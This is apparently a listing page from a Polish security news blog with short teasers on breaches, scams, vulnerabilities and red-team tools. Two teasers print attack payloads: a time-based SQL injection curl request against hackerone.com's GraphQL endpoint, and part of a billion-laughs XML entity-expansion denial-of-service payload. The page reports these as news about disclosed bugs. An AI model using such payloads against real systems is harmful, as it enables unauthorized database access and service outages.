Raczej nikt nie chwali się wynikami analizy powłamaniowej, szczególnie gdy jest ona druzgocąca. Ale inaczej jest w przypadku Equifax. Przypomnijmy – w wyniku naruszeń bezpieczeństwa wyciekło niemal 150 milionów rekordów danych osobowych. Dodatkowo – około 200 000 numerów kart kredytowych. Obecnie mamy dostępny rządowy raport opisujący szczegóły incydentu. Polecam zerknąć przynajmniej…
Czytaj dalej »
Supreme to marka dla bogatych hips ludzi ceniących swoją unikalność. Docenił to Samsung, wspierając się samym szefostwem Supreme, które wystąpiło na chińskiej konferencji organizowanej przez koreańskiego giganta. Wiadomo – Apple to styl życia, a Samsung też nie chce być gorszy. Problem w tym, że nawiązali współpracę i zaprosili na scenę ludzi…
Czytaj dalej »
Ostatnio aresztowano w Kanadzie szefową finansów Huawei – MENG Wanzou, grozi jej ekstradycja do USA. Tymczasem nie trzeba było wiele czekać aby pokazał się scam o tej treści. W tłumaczeniu na angielski: Hello, I am MENG Wanzou. Currently, I have been detained by Canadian customs. I have limited use of my phone. Right…
Czytaj dalej »
Zakaz kupowania nowych maszyn ma obowiązywać już od przyszłego miesiąca. A całkowity zakaz od kwietnia 2020 roku. Powód? Ta metoda komunikacji została uznana przez brytyjskie Ministerstwo Zdrowia za niezbyt bezpieczną: The Department of Health said a change to more modern communication methods was needed to improve patient safety and cyber…
Czytaj dalej »
Niedawno pisaliśmy o podatności potencjalnie dającej dostęp do danych około 500000 użytkowników Google+. Teraz Google publikuje nową informację – naprawiony obecnie błąd potencjalnie dotykał aż 52,5 mln użytkowników i w swojej naturze podobny był do poprzedniego problemu. Zewnętrzne aplikacje, który prosiły i otrzymywały dostęp do profilu użytkownika przez API, miały…
Czytaj dalej »
Dla studentów kierunków dziennikarskich to zapewne normalka – jedno wydarzenie można opisać czy sfotografować na różne sposoby. Zobaczmy na pierwszy z brzegu twit (ćwierk:P) : „Paris Burns„: Czy te zdjęcia są fejkiem? A może mają one ilustrować fakt, że we Francji wszystko spoko, tylko ci żądni sensacji dziennikarze… Ale może…
Czytaj dalej »
Problem opisany jest w ramach ID: SECURITY-595: Code execution through crafted URLs (błąd jest krytyczny, w skali CVSS 9.8 / 10, nie wymaga uwierzytelnienia). W skrócie, można wołać prawdopodobnie niemal dowolne metody javowe, korzystając właśnie z odpowiedniej konstrukcji URL-a: (…) any public method whose name starts with get, and that has a String, int, long,…
Czytaj dalej »
Jeden z czytelników podesłał nam ciekawego linka. Standard 5G może być rzeczywiście pewną rewolucją. Szybkości transferu liczące w setkach megabitów na sekundę (pojawiają się nawet informacje o 1Gbit, w praktyce, nie w teorii ;), niskie opóźnienia: Lower latency could help 5G mobile networks enable things such as multiplayer mobile gaming, factory…
Czytaj dalej »
Wszystko to i wiele więcej w poradniku (zbiorze linków) Awesome Red Teaming. Znajdą tutaj inspirację początkujący, ale nie zabraknie też kilku ciekawostek dla zaawansowanych. Zarówno jeśli chodzi o prezentacje, teksty, książki, jak i sprzęt, czasem dość groźny: KeySweeper is a stealthy Arduino-based device, camouflaged as a functioning USB wall charger, that…
Czytaj dalej »
Zastanawialiście się jak długo temperatura z Waszych palców zostaje na wciśniętych klawiszach klawiatury?. Okazuje się niespodziewanie długo. W czasie 20-30 sekund bez problemu można odczytać wszystkie „wciśnięcia” (i to np. dla hasła: 3xZFkMMv|Y). Graniczną wartością jest około 50-60 sekund. Wystarczy odpowiednio czuła kamera termowizyjna, trochę wiedzy i pomysłowości (hej, właśnie się…
Czytaj dalej »
Kasperski opisuje dość nietypową kampanię. Atakujący najpierw udawali kuriera, czy jeszcze lepiej – osobę szukającą pracy. Spotkanie jak to spotkanie – odbywa się często w sali konferencyjnej. A tam już blisko do urządzeń, które zna prawie każdy z nas: Na zdjęciu powyżej widać fragmenty cyrlicy – i jeśli zostało ono…
Czytaj dalej »
SQL injection to podatność stara jak SQL i cały czas popularna jak smog w Polsce. Tutaj ciekawy przykład SQLi w serwisie hackerone (krytyczność: 10/10 w skali CVSS). Podatność istniała w zapytaniu GraphQL: $ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(5\)%3B–%27 {}curl -X POST 0.03s user 0.01s system 0% cpu 5.726 total $ time…
Czytaj dalej »
Mamy dla Was kilka ciekawostek: kod sekurakolaj (działający na rozwal.to) – daje 14 dni darmowego dostępu – można go wpisać do 12.12.2018, dodaje dni od momentu wpisania. Jak ktoś jest sprytny – doszuka innego kodu, który niedawno publikowaliśmy na sekuraku (+7 dni) – kody łączą się! kod sekurakolaj – 50% off…
Czytaj dalej »
0-day we Flashu. Flash zaszyty w dokumencie Worda, Word w archiwum RAR, w którym znajduje się też plik .jpg. W pliku .jpg zaszyty trojan, który odpalany jest z exploita na Flasha. Całość po to, żeby maksymalnie utrudnić ew. alerty systemów antymalware. Dla wzrokowców: Sam dokument wygląda tak: Ciekawostką są wskazania…
Czytaj dalej »
Wpis jednego z bugbounterów. Billion laughs to jedna z klasycznych podatności typu DoS. Ten XML mówi sam za siebie ;) <?xml version=”1.0″?> <!DOCTYPE lolz [ <!ENTITY lol „lol”> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 „&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;”> <!ENTITY lol2 „&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;”> <!ENTITY lol3 „&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;”> <!ENTITY lol4 „&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;”> <!ENTITY lol5 „&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;”> <!ENTITY lol6 „&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;”> <!ENTITY…
Czytaj dalej »